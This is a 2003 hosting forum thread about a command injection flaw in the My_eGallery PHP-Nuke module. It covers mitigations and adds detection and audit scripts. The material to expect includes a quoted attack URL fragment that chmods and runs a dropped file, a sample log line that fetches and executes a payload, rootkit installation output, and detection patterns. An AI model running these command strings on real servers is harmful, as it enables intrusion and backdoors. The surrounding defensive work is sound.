The Community Forums


ATTENTION: My_eGallery exploit could give root access

Discussion in 'General Discussion' started by geekhosting, Dec 15, 2003.

  1. geekhosting

    geekhosting Well-Known Member

    Joined:
    Apr 7, 2003
    Messages:
    46
    Likes Received:
    0
    Trophy Points:
    6
    After snooping around through my Apache logs, I stumbled upon what I found out to be a recent exploit of the My_eGallery module for PHP-Nuke and PostNuke.

    According to BugTraq this exploit only allows users to inject .txt, .jpg, and .gif files into a website; however, this is not true.

    After playing with the strings I was able to decompress .tar.gz files, compile and run programs on my test servers, and in several instances download/run trojans and rootkits :rolleyes:

    I recommend that you take the following actions.

    MAKE SURE /tmp is mounted with noexec (saved my ass)
    Notify your clients that use this and let them know that there is a fix out

    or disable it altogether by chmod 000 folder :) and let them come to you.

    Due to the concern that this exploit poses to me I will not release the strings on these forums, but if you would like a demonstration I will be more than happy to put something in your /tmp folder :D and of course it would not be malicious
     
  2. anand

    anand Well-Known Member

    Joined:
    Nov 11, 2002
    Messages:
    1,435
    Likes Received:
    1
    Trophy Points:
    38
    Location:
    India
    cPanel Access Level:
    DataCenter Provider
    Using phpsuexec and open_basedir doesn't solve this problem?
     
  3. geekhosting

    geekhosting Well-Known Member

    Joined:
    Apr 7, 2003
    Messages:
    46
    Likes Received:
    0
    Trophy Points:
    6
    Not that I have seen. The strings that are run will use the user nobody to run and execute. Are there any folders where nobody isn't allowed?
     
  4. solan

    solan Active Member

    Joined:
    Apr 11, 2003
    Messages:
    37
    Likes Received:
    0
    Trophy Points:
    6
    I know "geekhosting" personally and he gave me a demo, and while the client was removing the My_eGallery he (geekhosting) was still able to get the file in! This is no LIE

    -rwsrwsrwt 1 nobody nobody 388098 Jul 5 2000 PHP-Nuke-1.0.tar.gz*

    He just did a simple test with something that couldn't be bad! So if you need him to do this for you to prove this is a very very big exploit then so be it, but I would personally check all clients

    root@host1 [/]# find ./ -name My_eGallery

    This will locate all the folders for you really quickly and you'll be able to take a further step in running this

    root@host1 [/]# chmod 000 /home*/*/public_html/modules/My_eGallery

    Hope this simple fix helps for the time being; this will totally disable their ability to use this module!
     
  5. anand

    anand Well-Known Member

    Joined:
    Nov 11, 2002
    Messages:
    1,435
    Likes Received:
    1
    Trophy Points:
    38
    Location:
    India
    cPanel Access Level:
    DataCenter Provider
    When you enable phpsuexec, the scripts will run as the user only and not as the nobody user. Try phpsuexec. Once the script runs only as the user, he has access to only his home directory.

    It should be worth a try. If I'm wrong please do let me know.
     
  6. geekhosting

    geekhosting Well-Known Member

    Joined:
    Apr 7, 2003
    Messages:
    46
    Likes Received:
    0
    Trophy Points:
    6
    Got a client using My_eGallery, I would love to test this.
     
  7. anand

    anand Well-Known Member

    Joined:
    Nov 11, 2002
    Messages:
    1,435
    Likes Received:
    1
    Trophy Points:
    38
    Location:
    India
    cPanel Access Level:
    DataCenter Provider
    If you can, try with phpsuexec enabled with open_basedir. My guess is it should help.
     
  8. geekhosting

    geekhosting Well-Known Member

    Joined:
    Apr 7, 2003
    Messages:
    46
    Likes Received:
    0
    Trophy Points:
    6
    Well, I just tried it on my production server :( which has open_basedir and phpsuexec and it went right past it.... so although that was a logical answer it still did nothing.
     
  9. Website Rob

    Website Rob Well-Known Member

    Joined:
    Mar 23, 2002
    Messages:
    1,506
    Likes Received:
    0
    Trophy Points:
    36
    Location:
    Alberta, Canada
    cPanel Access Level:
    Root Administrator
    geekhosting, good catch and thanks for sharing. Although you say that phpsuexec enabled with open_basedir did nothing, did you have /tmp noexec set up like you mentioned in your first post?

    I also wonder how well this exploit would work, if someone is using safe_mode "ON"?

    Also, you mention there is a "fix" for it -- any idea where this is available from?
     
  10. rvskin

    rvskin Well-Known Member
    PartnerNOC

    Joined:
    Feb 19, 2003
    Messages:
    400
    Likes Received:
    1
    Trophy Points:
    18
  11. anand

    anand Well-Known Member

    Joined:
    Nov 11, 2002
    Messages:
    1,435
    Likes Received:
    1
    Trophy Points:
    38
    Location:
    India
    cPanel Access Level:
    DataCenter Provider
  12. anand

    anand Well-Known Member

    Joined:
    Nov 11, 2002
    Messages:
    1,435
    Likes Received:
    1
    Trophy Points:
    38
    Location:
    India
    cPanel Access Level:
    DataCenter Provider
    Except for copying / uploading files, were you able to execute any commands / code which could endanger the system in any manner?

    Still confused: when the PHP script runs as the user, and the user is restricted to only certain directories, how can he get access to outside dirs / files?
     
  13. rvskin

    rvskin Well-Known Member
    PartnerNOC

    Joined:
    Feb 19, 2003
    Messages:
    400
    Likes Received:
    1
    Trophy Points:
    18
    It can run some commands, at least 'wget', 'cd', etc., and like 'geekhosting' said, he can upload rootkits, trojans, etc. And an experienced hacker could easily manage to run it.
     
  14. geekhosting

    geekhosting Well-Known Member

    Joined:
    Apr 7, 2003
    Messages:
    46
    Likes Received:
    0
    Trophy Points:
    6
    OK,
    as a matter of fact I was physically able to rm -rf /home/*. As stated earlier, this goes beyond the advisory, which has played it down. The exploit is actually 2 parts.

    One where there is a PHP script written to do damage (different than the advisory, I might add) and the trailing end of the URL which performs system commands. Here is the last bit of the code which I found someone attempting to use on my system

    chmod%207777%20tt.txt;./tt.txt
     
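    One way to hunt for this pattern in Apache access logs, as an added example that is not from the thread: it URL-decodes requests to the My_eGallery module and flags those whose query string carries a shell command separator followed by a download/chmod/exec command, the "trailing end of the URL" geekhosting describes. The log lines are constructed, and the query parameter name is a placeholder.

```shell
#!/bin/sh
# Added example (not from the thread): flag access-log requests to the
# My_eGallery module whose decoded query string contains shell command
# separators plus a download/chmod/exec command.

# Decode the percent-escapes that matter for command separators.
url_decode() {
    sed -e 's/%20/ /g' -e 's/%3[bB]/;/g' -e 's/%7[cC]/|/g' \
        -e 's/%26/\&/g' -e 's/%60/`/g' -e 's/%24/$/g' -e 's/+/ /g'
}

# Print every decoded line that hits a My_eGallery script AND contains a
# command separator (; && || ` $( ) AND a typical dropper command.
# A lone '&' is deliberately ignored: it separates ordinary query params.
flag_egallery_injection() {
    grep -i 'modules/My_eGallery/' "$1" | url_decode \
      | grep -E '(;|&&|\|\||`|\$\()' \
      | grep -Ei '(wget|curl|lynx|chmod|cd |\./)'
}

# Number of flagged requests in a log file (returned on stdout).
count_flagged() {
    flag_egallery_injection "$1" | wc -l | tr -d ' '
}

# Constructed sample log: one injection attempt (the fragment quoted in
# the thread, with a placeholder parameter name), two benign gallery hits,
# one hit on an unrelated module. 203.0.113.0/24 is a documentation range.
SAMPLE_LOG=$(mktemp)
cat > "$SAMPLE_LOG" <<'EOF'
203.0.113.5 - - [15/Dec/2003:03:12:44 -0500] "GET /modules/My_eGallery/public/displayCategory.php?param=cd%20/tmp;wget%20http://203.0.113.9/tt.txt;chmod%207777%20tt.txt;./tt.txt HTTP/1.1" 200 512
203.0.113.6 - - [15/Dec/2003:03:13:01 -0500] "GET /modules/My_eGallery/public/displayCategory.php?cid=3 HTTP/1.1" 200 4201
203.0.113.6 - - [15/Dec/2003:03:13:20 -0500] "GET /modules/My_eGallery/public/displayCategory.php?cid=3&page=2 HTTP/1.1" 200 4190
203.0.113.7 - - [15/Dec/2003:03:14:10 -0500] "GET /modules/News/index.php?sid=12 HTTP/1.1" 200 300
EOF

echo "Flagged requests: $(count_flagged "$SAMPLE_LOG")"
flag_egallery_injection "$SAMPLE_LOG"
# On a live box: flag_egallery_injection /usr/local/apache/domlogs/<domain>
```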
  15. admin0

    admin0 Active Member

    Joined:
    Aug 11, 2002
    Messages:
    29
    Likes Received:
    0
    Trophy Points:
    1
    Basic steps that would help are:

    1. update the system software
    2. chmod 700 <compilers>
    3. Mount /tmp and /var/tmp with nosuexec
    4. chmod 700 wget, lynx and other that can download files
    5. install mod_security, with detail access list.

    Hope this helps

    :p
     
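    A quick audit of the two filesystem items in the list above and the /tmp noexec advice from the first post, as an added example that is not from the thread: it parses a mount table in /proc/mounts format and reports which of noexec/nosuid a scratch filesystem lacks, and lists download/compile tools still executable by "other". The mount table and bin directory it runs against are constructed.

```shell
#!/bin/sh
# Added example (not from the thread): check that /tmp and /var/tmp carry
# noexec,nosuid and that compilers/download tools are not world-executable.

# Usage: missing_opts <mount-table-file> <mountpoint>
# Prints the options still missing, or "not-a-mountpoint" if <mountpoint>
# is not a separate filesystem (then it inherits the parent's options).
missing_opts() {
    opts=$(awk -v mp="$2" '$2 == mp { o = $4 } END { print o }' "$1")
    [ -n "$opts" ] || { echo "not-a-mountpoint"; return; }
    out=""
    for want in noexec nosuid; do
        case ",$opts," in
            *,"$want",*) ;;
            *) out="$out $want" ;;
        esac
    done
    echo "${out# }"
}

# Usage: world_exec_tools <dir>
# Lists the tools from the post's chmod 700 items that others can still run.
world_exec_tools() {
    find "$1" -maxdepth 1 -type f \
        \( -name gcc -o -name cc -o -name wget -o -name lynx \) -perm -o=x
}

# Constructed mount table: /tmp correct, /var/tmp missing noexec,
# /home not a separate filesystem at all.
SAMPLE_MOUNTS=$(mktemp)
cat > "$SAMPLE_MOUNTS" <<'EOF'
/dev/sda1 / ext3 rw 0 0
/dev/sda3 /tmp ext3 rw,noexec,nosuid,nodev 0 0
/dev/sda4 /var/tmp ext3 rw,nosuid 0 0
EOF

for mp in /tmp /var/tmp /home; do
    m=$(missing_opts "$SAMPLE_MOUNTS" "$mp")
    [ -z "$m" ] && echo "$mp: ok" || echo "$mp: $m"
done

# Constructed bin directory: wget left 755, gcc already 700.
SAMPLE_BIN=$(mktemp -d)
: > "$SAMPLE_BIN/wget"; chmod 755 "$SAMPLE_BIN/wget"
: > "$SAMPLE_BIN/gcc";  chmod 700 "$SAMPLE_BIN/gcc"
echo "world-executable tools: $(world_exec_tools "$SAMPLE_BIN" | sed 's#.*/##')"
# On a live box: missing_opts /proc/mounts /tmp; world_exec_tools /usr/bin
```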
  16. jamesbond

    jamesbond Well-Known Member

    Joined:
    Oct 9, 2002
    Messages:
    738
    Likes Received:
    1
    Trophy Points:
    18
    Is it safe to symlink /var/tmp to /tmp?

    Or is /var/tmp used to execute programs like buildapache, RPMs or other software?

    My /tmp is 1 GB.

    If symlinking causes no problems then I would prefer to do it this way instead of creating a separate partition for /var/tmp as well.
     
  17. geekhosting

    geekhosting Well-Known Member

    Joined:
    Apr 7, 2003
    Messages:
    46
    Likes Received:
    0
    Trophy Points:
    6
  18. geekhosting

    geekhosting Well-Known Member

    Joined:
    Apr 7, 2003
    Messages:
    46
    Likes Received:
    0
    Trophy Points:
    6
    Forgot to add this:
    reimaged my test box with tighter security and managed to upload/install the fuckit rootkit with tighter restrictions.

    ##########################################
    ######### FucKit RK 0.4 by Cyrax #########
    ##########################################

    Preparing to install .... done!
    Phase #1: Unpacking & installing filez... done!
    Phase #2: Killing system loggers.
    Usage: /etc/init.d/syslog {start|stop|status|restart|condrestart}
    Phase #3: Starting backdoor... done!
    Warning: open_basedir restriction in effect. File is in wrong directory in /home/httpd/vhosts/ltest.com/httpdocs/modules/My_eGallery/public/displayCategory.php on line 3
     
    #18 geekhosting, Dec 16, 2003
    Last edited: Dec 16, 2003
  19. jamesbond

    jamesbond Well-Known Member

    Joined:
    Oct 9, 2002
    Messages:
    738
    Likes Received:
    1
    Trophy Points:
    18
    It will at least stop the script kiddies then, which would account for 99% of these types of attacks I would assume :)
     
  20. geekhosting

    geekhosting Well-Known Member

    Joined:
    Apr 7, 2003
    Messages:
    46
    Likes Received:
    0
    Trophy Points:
    6
    This might be true. I forgot to add that I did this on a Plesk box, which I have posted, and a cPanel box.

    Also there seems to be quite a discussion about the recent exploit at RS (ev1 servers). It seems as if many of their servers are getting hacked
     